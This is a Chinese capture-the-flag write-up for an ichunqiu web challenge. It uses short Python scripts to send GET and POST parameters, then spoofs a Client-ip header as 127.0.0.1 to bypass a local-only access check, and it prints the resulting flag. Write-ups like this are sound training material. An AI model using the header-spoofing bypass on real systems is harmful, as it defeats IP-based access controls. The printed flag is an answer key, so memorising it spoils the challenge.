https://ctfbox.ichunqiu.com/student/drill/scene
训练中心 场景实操 题目类型: Web 第2页第2行第1列
-----------------------------
web1
题目描述: find the flag
题目分值: 60分
-----------------------------
点击“下发题目”，然后打开网页，得到：
GET me hello with values:yes

写一些 Python 程序来获得结果。
注意：程序中的 URL 每次下发题目时都是不同的。

1. 根据提示，在 URL 后跟上 /?hello=yes 后调用 get
$ cat p1.py
-----------------------------
import requests

u = "http://eci-2ze2xuylwnk5zpph08hd.cloudeci1.ichunqiu.com/?hello=yes"
s = requests.Session()
r = s.get(u)
print(r.text)
-----------------------------
$ python p1.py
Then post me hello with values:yesyes

2. 根据提示，使用参数 hello:yesyes 调用 post
注意：URL 后面的 /?hello=yes 不能省略
$ cat p2.py
-----------------------------
import requests

u = "http://eci-2ze2xuylwnk5zpph08hd.cloudeci1.ichunqiu.com/?hello=yes"
s = requests.Session()
values = {'hello':'yesyes'}
r = s.post(u,values)
print(r.text)
-----------------------------
$ python p2.py
如果你看到该页面，很不幸，该页面只允许本地访问，你的IP不在允许范围内！

3. 根据提示，伪造 IP 地址后再次运行。
$ cat p3.py
-----------------------------
import requests

u = "http://eci-2ze2xuylwnk5zpph08hd.cloudeci1.ichunqiu.com/?hello=yes"
s = requests.Session()
values = {'hello':'yesyes'}
h = {'Client-ip':'127.0.0.1'}
r = s.post(u,values, headers=h)
print(r.text)
-----------------------------
$ python p3.py
flag{8e9d6f9e-1e92-4587-a039-77ef987de089}

完成

或者使用 Postman
或者使用 Burp Suite: Proxy, Repeater
